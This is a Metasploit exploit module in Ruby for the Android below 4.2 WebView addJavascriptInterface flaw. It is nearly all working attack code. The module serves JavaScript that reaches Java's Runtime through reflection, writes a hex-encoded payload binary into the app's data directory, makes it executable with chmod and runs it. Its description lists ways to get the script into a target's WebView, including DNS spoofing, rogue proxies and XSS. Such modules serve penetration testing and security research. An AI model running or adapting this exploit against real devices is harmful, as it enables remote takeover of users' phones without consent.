metasploit-framework/modules/exploits/android/browser/webview_addjavascriptinterface.rb

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::Remote::BrowserAutopwn

  autopwn_info({
    :os_flavor  => "Android",
    :arch       => ARCH_ARMLE,
    :javascript => true,
    :rank       => ExcellentRanking,
    :vuln_test  => %Q|
      for (i in top) {
        try {
          top[i].getClass().forName('java.lang.Runtime').getMethod('getRuntime', null);
          is_vuln = true; break;
        } catch(e) {}
      }
    |
  })

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Android < 4.2 WebView addJavascriptInterface MITM Code Execution',
      'Description' => %q{
            This module exploits an issue where MITM attackers can execute 
          arbitrary code on vulnerable Android devices. The issue is rooted in
          the use of the addJavascriptInterface function, which exposes Java
          Reflection to Javascript executing within a WebView instance. Many
          Android ad network integrations are known to be affected.

          To use this module, the attacker must have some way to inject the html/js
          served by metasploit into an affected Webview on the target device. There
          are a number of ways to do this (DNS spoofing, rogue HTTP proxy, XSS injection, etc).

          This module can also get a shell on some versions of the Browser app on
          Android < 4.2, where the vendor has added an addJavascriptInterface wrapper.

          Note: Adding a .js to the URL will return plain javascript (no HTML markup).
      },
      'License'     => MSF_LICENSE,
      'Author'      => [
        'jduck', # original msf module
        'joev'   # static server
      ],
      'References'     => [
        ['URL', 'https://labs.mwrinfosecurity.com/blog/2012/04/23/adventures-with-android-webviews/'],
        ['URL', 'http://50.56.33.56/blog/?p=314'],
        ['URL', 'https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-'+
                'addjavascriptinterface-remote-code-execution/']
      ],
      'Platform'       => 'linux',
      'Arch'           => ARCH_ARMLE,
      'DefaultOptions' => { 'PrependFork' => true },
      'Targets'        => [ [ 'Automatic', {} ] ],
      'DisclosureDate' => 'Dec 21 2012',
      'DefaultTarget'  => 0
    ))
  end

  def on_request_uri(cli, req)
    if req.uri.end_with?('js')
      print_status("Serving javascript")
      send_response(cli, js, 'Content-type' => 'text/javascript')
    else
      print_status("Serving HTML")
      send_response_html(cli, html)
    end
  end

  def js
    %Q|
      function exec(obj) {
        // ensure that the object contains a native interface
        try { obj.getClass().getName(); } catch(e) { return; }

        // get the runtime so we can exec
        var m = obj.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null);
        var data = "#{Rex::Text.to_hex(payload.encoded_exe, '\\\\x')}";
        
        // get the process name, which will give us our data path
        var p = m.invoke(null,null).exec(['/system/bin/sh', '-c', 'cat /proc/$PPID/cmdline']);
        var ch, path = '/data/data/';
        while ((ch = p.getInputStream().read()) != 0) { path += String.fromCharCode(ch); }
        path += '/#{Rex::Text.rand_text_alpha(8)}';

        // build the binary, chmod it, and execute it
        m.invoke(null,null).exec(['/system/bin/sh', '-c', 'echo "'+data+'" > '+path]).waitFor();
        m.invoke(null,null).exec(['chmod', '700', path]).waitFor();
        m.invoke(null,null).exec([path]);

        return true;
      }

      for (i in top) { if (exec(top[i]) === true) break; }
    |
  end

  def html
    "<!doctype html><html><body><script>#{js}</script></body></html>"
  end
end